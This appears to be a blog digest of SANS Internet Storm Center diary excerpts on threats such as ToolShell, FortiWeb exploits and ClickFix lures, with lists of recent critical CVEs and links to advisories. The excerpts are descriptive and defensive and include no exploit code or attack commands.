Category: Blog

CONTENTS:
=========================================================
INTERNET STORM CENTER SPOTLIGHT
OTHER INTERNET STORM CENTER ENTRIES
RECENT CVEs
=========================================================

INTERNET STORM CENTER SPOTLIGHT

ISC provides a free analysis and warning service to thousands of Internet users and organizations, and is actively working with Internet Service Providers to fight back against the most malicious attackers. https://isc.sans.edu/about.html

[Guest Diary] Hunting for SharePoint In-Memory ToolShell Payloads
Published: 2025-12-02
Last Updated: 2025-12-01 23:27:08 UTC
by James Woodworth, SANS.edu BACS Student (Version: 1)

[This is a Guest Diary by James Woodworth, an ISC intern as part of the SANS.edu Bachelor’s Degree in Applied Cybersecurity (BACS) program.

In July 2025, many of us were introduced to the Microsoft SharePoint exploit chain known as ToolShell. ToolShell exploits the deserialization and authentication bypass vulnerabilities, CVE-2025-53770 and CVE-2025-53771, in on-premises SharePoint Server 2016, 2019, and Subscription editions. When the exploit chain was initially introduced, threat actors used payloads that attempted to upload web shells to a SharePoint server’s file system. The problem for threat actors was that the uploaded web shells were easily detectable by most Endpoint Detection and Response (EDR) solutions. So the threat actors upped the game and reworked their payloads to execute in-memory. This new technique made it more difficult for defenders to detect the execution of these new payloads.

Many articles have been written on the technical details of the ToolShell vulnerabilities, so I won’t go into an in-depth analysis here. If you want an in-depth analysis, check out the Securelist article, ToolShell: a story of five vulnerabilities in Microsoft SharePoint. What I will present to you in this post is a process using Zeek Network Security Monitor, DaemonLogger, and Wireshark to hunt for in-memory ToolShell exploit payloads and how to decode them for further analysis.

Review Zeek Logs
The first step in the hunt is to review the HTTP requests to our SharePoint server. We will do this by reviewing our Zeek http logs and looking for POST requests that contain the following indicators of a malicious request …

Red the full entry: https://isc.sans.edu/diary/Guest+Diary+Hunting+for+SharePoint+InMemory+ToolShell+Payloads/32524/

Conflicts between URL mapping and URL based access control
Published: 2025-11-24
Last Updated: 2025-11-24 16:54:38 UTC
by Johannes Ullrich (Version: 1)

We continue to encounter high-profile vulnerabilities related to the use of URL mapping (or “aliases”) with URL-based access control. Last week, we wrote about the Oracle Identity Manager vulnerability. I noticed some scans for an older vulnerability with similar roots today …

This request attempts to exploit a vulnerability in Hitachi Vantara Pentaho Business Analytics Server (CVE-2022-43939 and CVE-2022-43769). In this case, the end of the URL (/require[.]js) bypasses authentication. However, the request is still processed by “ldapTreeNodeChildren”, which is vulnerable to a template injection, causing the code to be executed. As last week, it appears that the “Chicago Rapper” Rondo botnet is again exploiting this vulnerability.

However, let’s examine the underlying cause of this issue.

For many applications, it makes sense to exempt certain URLs from authentication. For example, help pages, a password reset page, or a customer support contact page may need to be accessible even if the user is not logged in.

Webservers offer a wide range of options to map URLs to files on the web server’s file system. For example, for our API, we use this directive in Apache’s configuration …

Red the full entry: https://isc.sans.edu/diary/Conflicts+between+URL+mapping+and+URL+based+access+control/32518/

Use of CSS stuffing as an obfuscation technique?
Published: 2025-11-21
Last Updated: 2025-11-21 09:48:20 UTC
by Jan Kopriva (Version: 1)

From time to time, it can be instructive to look at generic phishing messages that are delivered to one’s inbox or that are caught by basic spam filters. Although one usually doesn’t find much of interest, sometimes these little excursions into what should be a run-of-the-mill collection of basic, commonly used phishing techniques can lead one to find something new and unusual. This was the case with one of the messages delivered to our handler inbox yesterday …

Red the full entry: https://isc.sans.edu/diary/Use+of+CSS+stuffing+as+an+obfuscation+technique/32510/

HOLIDAY HACK CHALLENGE

The 2025 SANS Holiday Hack Challenge is officially open!
Create your avatar, explore the new holiday adventure, and put your cybersecurity skills to the test through interactive challenges and puzzles. See if you’ve got what it takes to save the holidays.

– https://www.sans.org/cyber-ranges/holiday-hack-challenge

New Features This Year:

CTF-Only Mode – Jump straight into the technical action
Micro-Challenges – 10–15 min puzzles for quick, festive wins
Capstones – Longer, deeper challenges to truly level up

OTHER INTERNET STORM CENTER ENTRIES

YARA-X 1.10.0 Release: Fix Warnings (2025.11.23)
https://isc.sans.edu/diary/YARAX+1100+Release+Fix+Warnings/32514/

Wireshark 4.4.1 Released (2025.11.23)
https://isc.sans.edu/diary/Wireshark+441+Released/32512/

Oracle Identity Manager Exploit Observation from September (CVE-2025-61757) (2025.11.20)
https://isc.sans.edu/diary/Oracle+Identity+Manager+Exploit+Observation+from+September+CVE202561757/32506/

RECENT CVEs
The list is assembled by pulling recent vulnerabilities from NIST NVD, Microsoft, Twitter mentions of vulnerabilities, ISC Diaries and Podcast, and the CISA list of known exploited vulnerabilities. There are also some unscored, but significant, vulnerabilities at the end. This includes vulnerabilities that have not been added to the NVD yet.

CVE-2025-53770 – Microsoft SharePoint Server is vulnerable to code execution by unauthorized attackers through deserialization of untrusted data, with an exploit already in the wild for CVE-2025-53770.
Product: Microsoft SharePoint Server
CVSS Score: 0
** KEV since 2025-07-20 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-53770
ISC Diary: https://isc.sans.edu/diary/32524

CVE-2025-53771 – Microsoft Office SharePoint is susceptible to path traversal which could enable a spoofing attack over a network.
Product: Microsoft Office SharePoint
CVSS Score: 0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-53771
ISC Diary: https://isc.sans.edu/diary/32524

CVE-2025-48633 – Android Framework contains an unspecified vulnerability that allows for information disclosure. Product: Android Framework
CVSS Score: N/A
** KEV since 2025-12-02 **
CVE Record: https://www.cve.org/CVERecord?id=CVE-2025-48633 (Reserved)
ISC Podcast: https://isc.sans.edu/podcastdetail/9720
References: https://source.android.com/docs/security/bulletin/2025-12-01

CVE-2025-48572 – Android Framework contains an unspecified vulnerability that allows for privilege escalation.
Product: Android Framework
CVSS Score: N/A
** KEV since 2025-12-02 **
CVE Record: https://www.cve.org/CVERecord?id=CVE-2025-48572 (Reserved)
ISC Podcast: https://isc.sans.edu/podcastdetail/9720
References: https://source.android.com/docs/security/bulletin/2025-12-01

CVE-2025-58360 – GeoServer versions 2.26.0 to 2.26.2 and 2.25.6 are vulnerable to an XML External Entity (XXE) exploit through the /geoserver/wms endpoint allowing attackers to define external entities within XML requests.
Product: GeoServer
CVSS Score: 8.2
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-58360
ISC Podcast: https://isc.sans.edu/podcastdetail/9718
NVD References:
– https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525
– https://osgeo-org.atlassian.net/browse/GEOS-11682

CVE-2025-60739 – Ilevia EVE X1 Server Firmware Version v4.7.18.0.eden and before, Logic Version v6.00 – 2025_07_21 is vulnerable to CSRF, allowing remote attackers to execute arbitrary code via the /bh_web_backend component.
Product: Ilevia EVE X1 Server Firmware
CVSS Score: 9.6
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-60739

CVE-2025-63729 – Syrotech SY-GPON-1110-WDONT allows attackers to extract sensitive SSL information from firmware.
Product: Syrotech SY-GPON-1110-WDONT SYRO_3.7L_3.1.02-240517
CVSS Score: 9.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63729

CVE-2025-33187 – NVIDIA DGX Spark GB10 has a vulnerability in SROOT, allowing attackers with privileged access to potentially execute code, disclose information, tamper with data, disrupt services, or escalate privileges.
Product: NVIDIA DGX OS
CVSS Score: 9.3
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-33187
NVD References:
– https://nvidia.custhelp.com/app/answers/detail/a_id/5720
– https://www.cve.org/CVERecord?id=CVE-2025-33187

CVE-2025-65084 – Ashlar-Vellum Cobalt, Xenon, Argon, Lithium, and Cobalt Share versions 12.6.1204.207 and prior are vulnerable to an Out-of-Bounds Write flaw that could lead to information disclosure or code execution.
Product: Ashlar-Vellum
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-65084
NVD References: https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-01

CVE-2025-65085 – Ashlar-Vellum Cobalt, Xenon, Argon, Lithium, and Cobalt Share versions 12.6.1204.207 and prior are vulnerable to a Heap-based Buffer Overflow flaw that could lead to data disclosure or code execution.
Product: Ashlar-Vellum
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-65085
NVD References: https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-01

CVE-2025-61168 – SIGB PMB v8.0.1.14 is vulnerable to remote code execution through unserializing arbitrary files in cms_rest.php.
Product: SIGB PMB
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-61168

CVE-2025-64063 – Primakon Pi Portal 1.0.18 API endpoints lack sufficient authorization checks, allowing standard users to bypass UI restrictions, manipulate data outside their scope, and potentially compromise data integrity and confidentiality.
Product: Primakon Project Contract Management
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64063

CVE-2025-51742 through CVE-2025-51746 – JSH_ERP 2.3.1 by jishenghua is vulnerable to Fastjson deserialization
Product: JSH_ERP
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-51742
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-51743
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-51744
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-51745
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-51746

CVE-2025-64656 – Out-of-bounds read in Application Gateway allows an unauthorized attacker to elevate privileges over a network.
Product: Microsoft Application Gateway
CVSS Score: 9.4
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64656
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64656

CVE-2025-64657 – Stack-based buffer overflow in Azure Application Gateway allows an unauthorized attacker to elevate privileges over a network.
Product: Microsoft Azure Application Gateway
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64657
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64657

CVE-2025-66022 – FACTION allows unauthenticated users to upload malicious extensions that can execute arbitrary system commands on the host running Faction before version 1.7.1, enabling remote code execution (RCE).
Product: FACTION PenTesting Report Generation and Collaboration Framework
CVSS Score: 9.6
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-66022

CVE-2025-59390 – Apache Druid’s Kerberos authenticator vulnerability allows for weak fallback secrets to be generated by `ThreadLocalRandom`, potentially enabling attackers to predict or brute force authentication cookies, leading to token forgery or authentication bypass.
Product: Apache Druid Kerberos authenticator
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-59390
NVD References: http://www.openwall.com/lists/oss-security/2025/11/26/1

CVE-2025-62354 – Cursor allows unauthorized attackers to execute arbitrary code by improperly handling special elements in OS commands, leading to command injections.
Product: Cursor
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-62354

CVE-2025-65236 – OpenCode Systems USSD Gateway OC Release: 5 is vulnerable to SQL injection via the Session ID parameter in the /occontrolpanel/index.php endpoint.
Product: OpenCode Systems USSD Gateway OC
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-65236

CVE-2025-55469 – Incorrect access control in youlai-boot v2.21.1 allows attackers to escalate privileges and access the Administrator backend.
Product: youlai youlai-boot
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-55469

CVE-2025-64126 – The application is vulnerable to OS command injection due to lack of proper input validation, allowing attackers to inject arbitrary commands.
Product: Zenitel TCIV-3+
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64126
NVD References: https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-03

CVE-2025-64127 – The vulnerable product allows unauthenticated attackers to execute arbitrary commands remotely by incorporating user-supplied input into OS commands without proper validation.
Product: Zenitel TCIV-3+
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64127
NVD References: https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-03

CVE-2025-64128 – The vulnerable product is susceptible to OS command injection due to inadequate validation of user inputs, potentially enabling attackers to insert arbitrary commands.
Product: Zenitel TCIV-3+
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64128
NVD References: https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-03

CVE-2025-64130 – Zenitel TCIV-3+ is susceptible to a reflected cross-site scripting vulnerability, enabling remote attackers to run malicious JavaScript on victims’ browsers.
Product: Zenitel TCIV-3+
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64130
NVD References: https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-03

CVE-2025-26155 – NCP Secure Enterprise Client 13.18 and NCP Secure Entry Windows Client 13.19 have an Untrusted Search Path vulnerability.
Product: NCP Secure Enterprise Client 13.18
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-26155

CVE-2025-65669 – classroomio 0.1.13 allows students to delete courses from the Explore page without proper authorization, bypassing admin-only restrictions.
Product: classroomio 0.1.13
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-65669

CVE-2025-50433 – Imonnit.com (2025-04-24) is vulnerable to malicious actors gaining escalated privileges and taking over arbitrary user accounts through a crafted password reset.
Product: Imonnit.com
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-50433

CVE-2025-65276 – HashTech project is vulnerable to unauthenticated administrative access, allowing attackers to take full control of the admin dashboard and perform various malicious activities.
Product: HashTech
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-65276

CVE-2025-40934 – XML-Sig versions 0.27 through 0.67 incorrectly validate XML files if signatures are omitted, allowing attackers to pass verification checks by removing the signature from the XML document.
Product: XML-Sig Perl
CVSS Score: 9.3
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-40934

CVE-2025-12419 – Mattermost versions 10.12.x <= 10.12.1, 10.11.x <= 10.11.4, 10.5.x <= 10.5.12, 11.0.x <= 11.0.3 are vulnerable to an issue where an authenticated attacker with team creation privileges can take over a user account by manipulating authentication data during the OAuth completion flow.
Product: Mattermost
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12419

CVE-2025-12421 – Mattermost versions 11.0.x <= 11.0.2, 10.12.x <= 10.12.1, 10.11.x <= 10.11.4, 10.5.x <= 10.5.12 have a vulnerability that allows an authenticated user to perform account takeover via a specially crafted email address when switching authentication methods.
Product: Mattermost
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12421

CVE-2025-64314 – Permission control vulnerability in the memory management module.
Impact: Successful exploitation of this vulnerability may affect confidentiality.
Product: Huawei Harmonyos
CVSS Score: 9.3
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64314

CVE-2025-65112 – PubNet is vulnerable to an identity spoofing and privilege escalation issue in version 1.1.3 due to unauthenticated users being able to upload packages as any user by providing arbitrary author-id values.
Product: PubNet Dart & Flutter package service
CVSS Score: 9.4
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-65112

CVE-2025-35028 – HexStrike AI MCP server allows attackers to execute commands with root privileges by providing a command-line argument starting with a semi-colon to an API endpoint created by the EnhancedCommandExecutor class.
Product: HexStrike AI MCP server
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-35028

CVE-2025-12106 – OpenVPN fails to properly validate arguments, leading to a heap buffer over-read vulnerability.
Product: OpenVPN
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12106

CVE-2025-63525 – Blood Bank Management System 1.0 is vulnerable to authenticated attackers gaining elevated privileges through a crafted request in delete.php.
Product: Shridharshukl Blood_Bank_Management_System 1.0
CVSS Score: 9.6
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63525

CVE-2025-63531 – Blood Bank Management System 1.0’s receiverLogin.php component is vulnerable to SQL injection, enabling attackers to bypass authentication and access the system through manipulation of user-supplied input.
Product: Shridharshukl Blood_Bank_Management_System 1.0
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63531

CVE-2025-63532 – Blood Bank Management System 1.0’s cancel.php component allows attackers to inject SQL code through the search field, bypass authentication, and gain unauthorized access.
Product: Shridharshukl Blood_Bank_Management_System 1.0
CVSS Score: 9.6
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63532

CVE-2025-63535 – Blood Bank Management System 1.0 abs.php allows attackers to inject SQL code through the search field, leading to unauthorized system access.
Product: Shridharshukl Blood_Bank_Management_System 1.0
CVSS Score: 9.6
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63535

CVE-2025-3500 – Avast Antivirus (25.1.981.6) on Windows is vulnerable to Integer Overflow and Privilege Escalation before version 25.3.
Product: Avast Antivirus
CVSS Score: 9.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-3500

CVE-2025-8351 – Avast Antivirus on MacOS is vulnerable to a Heap-based Buffer Overflow, Out-of-bounds Read issue during file scanning, potentially enabling Local Code Execution or Denial-of-Service of the antivirus engine process between versions 8.3.70.94 and 8.3.70.98.
Product: Avast Antivirus
CVSS Score: 9.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-8351

CVE-2025-51682 – mJobtime 15.7.2 has a client-side authorization vulnerability allowing attackers to modify code and access administrative features.
Product: mJobtime 15.7.2
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-51682

CVE-2025-65836 – PublicCMS V5.202506.b is vulnerable to SSRF. in the chat interface of SimpleAiAdminController.
Product: PublicCMS
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-65836

CVE-2025-66401 – MCP Watch is vulnerable to command injection in the cloneRepo method due to user-supplied githubUrl not being sanitized before passing to execSync.
Product: MCP Watch
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-66401

CVE-2025-41742 – Sprecher Automations SPRECON-E-C, SPRECON-E-P, SPRECON-E-T3 are vulnerable to unauthorized remote attacks due to default cryptographic keys, enabling attackers to manipulate projects and data or access devices through remote maintenance.
Product: Sprecher Automations SPRECON-E series
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-41742
NVD References: https://www.sprecher-automation.com/fileadmin/itSecurity/PDF/SPR-2511042_de.pdf

CVE-2025-41744 – Sprecher Automations SPRECON-E series has default cryptographic keys that can be exploited by remote attackers, compromising data confidentiality and integrity.
Product: Sprecher Automations SPRECON-E series
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-41744
NVD References: https://www.sprecher-automation.com/fileadmin/itSecurity/PDF/SPR-2511043_de.pdf

CVE-2025-6389 – The Sneeit Framework plugin for WordPress is vulnerable to Remote Code Execution in all versions up to 8.3 via the sneeit_articles_pagination_callback() function, allowing unauthenticated attackers to execute code on the server and potentially create new administrative user accounts.
Product: WordPress Sneeit Framework plugin
Active Installations: Unknown. Update to version 8.4, or a newer patched version.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-6389
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/b5ed8a39-50b0-4acf-9054-ba389c49f345?source=cve

CVE-2025-13559 – The EduKart Pro plugin for WordPress allows unauthenticated attackers to gain administrator access by exploiting a Privilege Escalation vulnerability.
Product: EduKart Pro WordPress
Active Installations: Unknown.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13559
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/d3a5be68-8073-48b0-a536-bb3a05e83dda?source=cve

CVE-2025-13595 – The CIBELES AI plugin for WordPress allows unauthenticated attackers to upload arbitrary files, leading to potential remote code execution.
Product: CIBELES AI plugin for WordPress
Active Installations: Unknown. Update to version 1.10.9, or a newer patched version.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13595
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/b3e89a1c-7606-4391-a389-fa18d0967046?source=cve

CVE-2025-13538 – The FindAll Listing plugin for WordPress allows unauthenticated attackers to gain administrator access by exploiting a Privilege Escalation vulnerability in versions up to 1.0.5.
Product: WordPress FindAll Listing plugin
Active Installations: Unknown. Update to version 1.1, or a newer patched version.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13538
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/14981949-271c-4f98-a6a1-b00619f1436d?source=cve

CVE-2025-13539 – The FindAll Membership plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.0.4, allowing unauthenticated attackers to potentially log in as administrative users.
Product: WordPress FindAll Membership plugin
Active Installations: Unknown. Update to version 1.1, or a newer patched version.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13539
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/a856a96a-68d2-462d-b523-840668980807?source=cve

CVE-2025-13540 – The Tiare Membership plugin for WordPress permits Privilege Escalation up to version 1.2 by allowing unauthenticated attackers to register as administrators through the ‘tiare_membership_init_rest_api_register’ function.
Product: Tiare Membership plugin for WordPress
Active Installations: Unknown. Update to version 1.3, or a newer patched version.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13540
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/6cf01a38-1fba-4c93-b3fa-acfdd5b19410?source=cve

CVE-2025-13675 – The Tiger theme for WordPress is vulnerable to Privilege Escalation allowing unauthenticated attackers to register as administrators.
Product: WordPress Tiger theme
Active Installations: Unknown
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13675
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/4750b57e-7d8d-49d7-bbbf-46483eb97bd9?source=cve

CVE-2025-13615 – The StreamTube Core plugin for WordPress allows unauthenticated attackers to change user passwords and potentially take over administrator accounts due to a vulnerability in versions up to 4.78.
Product: StreamTube WordPress Core plugin
Active Installations: Unknown. Update to version 4.79, or a newer patched version.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13615
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/b812a0d7-99a1-4f61-b78a-78cea6a2ada1?source=cve

CVE-2025-13542 – The DesignThemes LMS plugin for WordPress allows unauthenticated attackers to achieve Privilege Escalation by registering as administrators.
Product: DesignThemes LMS plugin for WordPress
Active Installations: Unknown. Update to version 1.0.5, or a newer patched version.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13542
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/c880470f-3f81-47a2-b450-7074410e9f43?source=cve

CONTENTS:
=========================================================
INTERNET STORM CENTER SPOTLIGHT
OTHER INTERNET STORM CENTER ENTRIES
RECENT CVEs
=========================================================

INTERNET STORM CENTER SPOTLIGHT
ISC provides a free analysis and warning service to thousands of Internet users and organizations, and is actively working with Internet Service Providers to fight back against the most malicious attackers. https://isc.sans.edu/about.html

Honeypot: FortiWeb CVE-2025-64446 Exploits
Published: 2025-11-15
Last Updated: 2025-11-15 09:44:35 UTC
by Didier Stevens (Version: 1)

Like many have reported, we too noticed exploit attempts for CVE-2025-64446 in our honeypots.

These are POST requests to this path …

With this User Agent String …

Read the full entry: https://isc.sans.edu/diary/Honeypot+FortiWeb+CVE202564446+Exploits/32486/

KongTuke activity
Published: 2025-11-18
Last Updated: 2025-11-18 07:10:17 UTC
by Brad Duncan (Version: 1)

Introduction

Today’s diary is an example of KongTuke activity using fake CAPTCHA pages for a ClickFix-style lure.

Also known as LandUpdate808 or TAG-124 and described as a sophisticated TDS system, KongTuke has been active since at least May 2024. I keep track of this campaign through the infosec.exchange Mastodon instance, which is mostly information from the @monitorsg profile.

With URLscan, I can pivot on the information from Mastodon to find compromised sites and generate infection traffic in my lab.

On Monday, 2025-11-17, I found an example of a legitimate website with a KongTuke-injected script, and I generated some infection traffic …

Read the full entry: https://isc.sans.edu/diary/KongTuke+activity/32498/

Finger[.]exe & ClickFix
Published: 2025-11-16
Last Updated: 2025-11-16 07:27:55 UTC
by Didier Stevens (Version: 1)

The finger[.]exe command is used in ClickFix attacks.

finger is a very old UNIX command, that was converted to a Windows executable years ago, and is part of Windows since then.

In the ClickFix attacks, it is used to retrieve a malicious script via the finger protocol.

We wrote about finger.exe about 3 years ago: “Finger[.]exe LOLBin”.

What you need to know:

finger communication takes place over TCP
the finger protocol uses TCP port 79 and there is no way to change this port
finger[.]exe is not proxy aware
So if you are in a corporate environment with an explicit proxy (and blocking all Internet facing communication that doesn’t go through the proxy), the finger.exe command won’t be able to communicate.

And if you have a transparent proxy, finger.exe will be able to communicate provided the proxy allows TCP connections to port 79 …

Read the full entry: https://isc.sans.edu/diary/Fingerexe+ClickFix/32492/

OTHER INTERNET STORM CENTER ENTRIES

Decoding Binary Numeric Expressions (2025.11.17)
https://isc.sans.edu/diary/Decoding+Binary+Numeric+Expressions/32490/

SANS Holiday Hack Challenge 2025 (2025.11.16)
https://isc.sans.edu/diary/SANS+Holiday+Hack+Challenge+2025/32488/

Microsoft Office Russian Dolls (2025.11.14)
https://isc.sans.edu/diary/Microsoft+Office+Russian+Dolls/32484/

Formbook Delivered Through Multiple Scripts (2021.11.13)
https://isc.sans.edu/diary/Formbook+Delivered+Through+Multiple+Scripts/32480/

SmartApeSG campaign uses ClickFix page to push NetSupport RAT (2025.11.12)
https://isc.sans.edu/diary/SmartApeSG+campaign+uses+ClickFix+page+to+push+NetSupport+RAT/32474/

RECENT CVEs
The list is assembled by pulling recent vulnerabilities from NIST NVD, Microsoft, Twitter mentions of vulnerabilities, ISC Diaries and Podcast, and the CISA list of known exploited vulnerabilities. There are also some unscored, but significant, vulnerabilities at the end. This includes vulnerabilities that have not been added to the NVD yet.

CVE-2025-64446 – Fortinet FortiWeb versions 8.0.0 through 8.0.1, 7.6.0 through 7.6.4, 7.4.0 through 7.4.9, 7.2.0 through 7.2.11, and 7.0.0 through 7.0.11 are vulnerable to relative path traversal, enabling attackers to execute administrative commands via specially-crafted HTTP or HTTPS requests.
Product: Fortinet Fortiweb
CVSS Score: 9.8
** KEV since 2025-11-14 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64446
NVD References:
– https://fortiguard.fortinet.com/psirt/FG-IR-25-910
– https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-64446

CVE-2025-58034 – Fortinet FortiWeb versions 8.0.0 through 8.0.1, 7.6.0 through 7.6.5, 7.4.0 through 7.4.10, 7.2.0 through 7.2.11, and 7.0.0 through 7.0.11 are vulnerable to OS command injection, which could allow an authenticated attacker to execute unauthorized code on the underlying system via crafted HTTP requests or CLI commands.
Product: Fortinet FortiWeb
CVSS Score: 7.2
** KEV since 2025-11-18 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-58034
NVD References:
– https://fortiguard.fortinet.com/psirt/FG-IR-25-513
– https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-58034

CVE-2025-12480 – Triofox is vulnerable to an Improper Access Control flaw, allowing access to initial setup pages post-completion in versions before 16.7.10368.56560.
Product: Triofox
CVSS Score: 0
** KEV since 2025-11-12 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12480
ISC Podcast: https://isc.sans.edu/podcastdetail/9696

CVE-2025-62215 – Windows Kernel is vulnerable to race conditions that can be exploited by an authorized attacker to locally elevate privileges.
Product: Microsoft Windows 10 1809
CVSS Score: 7.0
** KEV since 2025-11-12 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-62215
NVD References:
– https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62215
– https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-62215

CVE-2025-42887 – SAP Solution Manager is vulnerable to code injection by authenticated attackers through remote-enabled function modules, potentially granting full system control and severely impacting confidentiality, integrity, and availability.
Product: SAP Solution Manager
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-42887
NVD References: https://url.sap/sapsecuritypatchday

CVE-2025-42890 – SAP SQL Anywhere Monitor (Non-GUI) has baked credentials into the code, allowing unintended users to access resources and potentially execute arbitrary code, posing a high risk to system security.
Product: SAP SQL Anywhere Monitor
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-42890
NVD References: https://url.sap/sapsecuritypatchday

CVE-2017-20210 – Photo Station 5.4.1 & 5.2.7 have a vulnerability related to XMR mining programs.
Product: QNAP Photo Station
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2017-20210
NVD References: https://www.qnap.com/en-in/security-advisory/nas-201705-04

CVE-2025-8324 – Zohocorp ManageEngine Analytics Plus versions 6170 and below are vulnerable to Unauthenticated SQL Injection due to the improper filter configuration.
Product: Zohocorp ManageEngine Analytics Plus
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-8324
NVD References: https://www.manageengine.com/analytics-plus/CVE-2025-8324.html

CVE-2025-13021, CVE-2025-13022, CVE-2025-13023 & CVE-2025-13026 – Incorrect boundary conditions in the Graphics: WebGPU component. These vulnerabilities affects Firefox < 145.
Product: Mozilla Firefox
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13021
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13022
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13023
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13026
NVD References: https://www.mozilla.org/security/advisories/mfsa2025-87/

CVE-2025-13024 – JIT miscompilation in the JavaScript Engine: JIT component. This vulnerability affects Firefox < 145.
Product: Mozilla Firefox
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13024
